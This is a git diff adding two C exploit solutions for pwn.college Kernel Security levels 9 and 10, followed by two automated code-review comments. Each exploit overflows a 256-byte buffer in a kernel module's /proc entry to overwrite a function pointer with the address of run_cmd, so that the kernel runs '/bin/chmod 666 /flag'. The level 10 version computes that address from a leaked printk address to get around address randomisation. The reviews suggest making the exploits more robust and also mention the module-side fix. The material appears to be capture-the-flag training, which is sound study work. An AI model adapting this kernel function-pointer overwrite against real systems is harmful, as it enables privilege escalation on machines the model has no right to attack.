diff --git a/PwnCollege/KernelSecurity/Level10.0/exploit.c b/PwnCollege/KernelSecurity/Level10.0/exploit.c
new file mode 100644
index 0000000..3ae1acd
--- /dev/null
+++ b/PwnCollege/KernelSecurity/Level10.0/exploit.c
@@ -0,0 +1,26 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+struct evil
+{
+ char buffer[256];
+ int (*log_function)(const char *, ...);
+} s;
+
+int main() {
+ int fd = open("/proc/pwncollege", O_WRONLY);
+ memset(s.buffer, '0', 256);
+ write(fd, &s, 256);
+ uint64_t printk_addr;
+ scanf("%llx", &printk_addr);
+ s.log_function = printk_addr - 0xffffffffb90b69a9 + 0xffffffffb9089b30; // run_cmd
+ printf("%llx\n", s.log_function);
+ // run_cmd doesn't use stdin nor stdout. It also doesn't use current working directory. Its CWD is /. The executable should use absolute path.
+ strcpy(s.buffer, "/bin/chmod 666 /flag");
+ write(fd, &s, sizeof(struct evil) - 1);
+}
\ No newline at end of file
diff --git a/PwnCollege/KernelSecurity/Level9.0/exploit.c b/PwnCollege/KernelSecurity/Level9.0/exploit.c
new file mode 100644
index 0000000..5dc5b8b
--- /dev/null
+++ b/PwnCollege/KernelSecurity/Level9.0/exploit.c
@@ -0,0 +1,20 @@
+#include
+#include
+#include
+#include
+#include
+#include
+
+struct evil
+{
+ char buffer[256];
+ int (*log_function)(const char *, ...);
+} s;
+
+int main() {
+ int fd = open("/proc/pwncollege", O_WRONLY);
+ strcpy(s.buffer, "/bin/chmod 666 /flag");
+ s.log_function = 0xffffffff81089b30ull; // run_cmd
+ // run_cmd doesn't use stdin nor stdout. It also doesn't use current working directory. Its CWD is /. The executable should use absolute path.
+ write(fd, &s, sizeof(struct evil) - 1);
+}
\ No newline at end of file
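Review bot: In Level10.0/exploit.c, `scanf("%llx", &printk_addr)` is unchecked and its conversion does not match `uint64_t`, so a failed parse leaves `printk_addr` indeterminate and the next line computes with it; `if (scanf("%" SCNx64, &printk_addr) != 1) return 1;` fixes both, provided `<inttypes.h>` is among the includes (their names are not visible in this rendering). The assignment to `s.log_function` converts a `uint64_t` expression to a function pointer with no cast, and `printf("%llx\n", s.log_function)` passes a function pointer to an integer conversion; both need an explicit cast through `uintptr_t`, and GCC 14 and later reject the implicit integer-to-pointer conversion by default. `open()` and both `write()` calls are unchecked as well, so a missing `/proc/pwncollege` entry fails silently with `fd == -1`; the unchecked calls and the uncast assignment also appear in the Level9.0 hunk.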
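Review bot: In Level9.0/exploit.c, the address `0xffffffff81089b30ull` and the length `sizeof(struct evil) - 1` are unexplained magic values, and the only comment on them is `// run_cmd`. The constant is presumably valid only for the one challenge kernel build with address randomization disabled (inferred from it being hard-coded here while Level10.0 derives it from a value read at run time), so a comment such as `/* run_cmd in the Level 9 challenge kernel; fixed address, assumes no KASLR */` would keep it from being read as portable. A second comment should state why the write is one byte short of the struct size, which the code does not show. For readers using this as a reference for the fix, it would help to note that `struct evil` apparently mirrors the module's layout, with a 256-byte buffer directly before a function pointer, and that the module-side remedy is to bound the copy length to the buffer size.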